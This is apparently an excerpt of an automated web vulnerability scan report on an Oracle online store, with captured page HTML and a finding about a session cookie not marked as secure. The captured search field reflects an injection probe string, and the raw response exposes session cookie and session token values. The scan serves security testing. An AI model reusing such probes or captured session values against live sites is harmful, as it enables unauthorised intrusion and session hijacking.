<!-- $Header: misibeCCtdItemDetail.jsp 120.0 2006/12/27 06:27:09 dpavani noship $ --><!-- Copy Of ibeCCtdItemDetail.jsp 120.7 --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCCtpSetItem.jsp 120.2 2006/01/17 21:52:05 ssekar noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="FR-FR"><HEAD> <TITLE> Site :Détails du produit </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Créer une liste d'achats'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Créer une liste d'achats'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Ignorer les éléments de navigation jusqu'au contenu de la page" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10084:1298440:F"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10084:1298440:F" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Canada </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> Chariot</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> Commandes</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> Profil</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> Connexion</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> S'enregistrer</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10084:1298440:F" class=OraGlobalButtonText> Aide</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10084:1298440:F">Accueil</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Recherche rapide </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Recherche rapide&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >Tous les produits <option value=10380>Accueil </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Mot(s) clé :</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value="'" ns= netsparker(0x00258F)"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Accéder","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10084:1298440:F" target=_parent class="searchBarLink"> Recherche avancée</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Aide</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Erreur</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>Le composant JavaScript est désactivé sur votre navigateur. Il doit être activé afin que l'application soit complètement fonctionnelle. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><!-- body section ------------------------------------------------------------><table summary='' border="0" width="100%"> <table summary='' cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <!-- left column --------------------------------------------------------> <TD vAlign=top width="15%"> <!-- $Header: ..
Cookie Not Marked As Secure

Cookie Not Marked As Secure
1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /OA_HTML/ibeCCtdMinisites.jsp

/OA_HTML/ibeCCtdMinisites.jsp CONFIRMED

https://oraclestore.oracle.com/OA_HTML/ibeCCtdMinisites.jsp?language=US&ref=http%3A%2F%2Foraclestore..

Identified Cookie

GSI

Request

GET /OA_HTML/ibeCCtdMinisites.jsp?language=US&ref=http%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCZzpHome.jsp HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y; domain=.oracle.com; path=/,BIGipServergsiap_store_http=1510838925.5150.0000; path=/
Connection: Keep-Alive
Keep-Alive: timeout=60, max=999
Content-Length: 5932
Date: Sun, 11 Sep 2011 17:56:21 GMT
































<!-- $Header: ibeCCtdMinisites.jsp 120.12.12010000.5 2010/02/15 11:20:58 amaheshw ship $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Specialty Sites </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp; </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5" class=OraGlobalButtonTextSelected> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> </table> </td> </tr></table><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><tr><td><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><a href=ibeCZzdMinisites.jsp?language=KO&ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5><img src="/OA_MEDIA/ibeLangKO.gif" width=43 height=19 alt="한국어" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=D&ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5><img src="/OA_MEDIA/ibeLangD.gif" width=45 height=19 alt="Deutsch" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=E&ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5><img src="/OA_MEDIA/ibeLangE.gif" width=45 height=19 alt="Español" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <img src="/OA_MEDIA/ibeLangUSS.gif" width=39 height=19 alt="English" border=0 ><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=F&ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5><img src="/OA_MEDIA/ibeLangF.gif" width=45 height=19 alt="Français" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=JA&ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5><img src="/OA_MEDIA/ibeLangJA.gif" width=42 height=19 alt="日本語" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=ZHT&ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp&GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5><img src="/OA_MEDIA/ibeLangZHT.gif" width=56 height=19 alt="繁體中文" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a 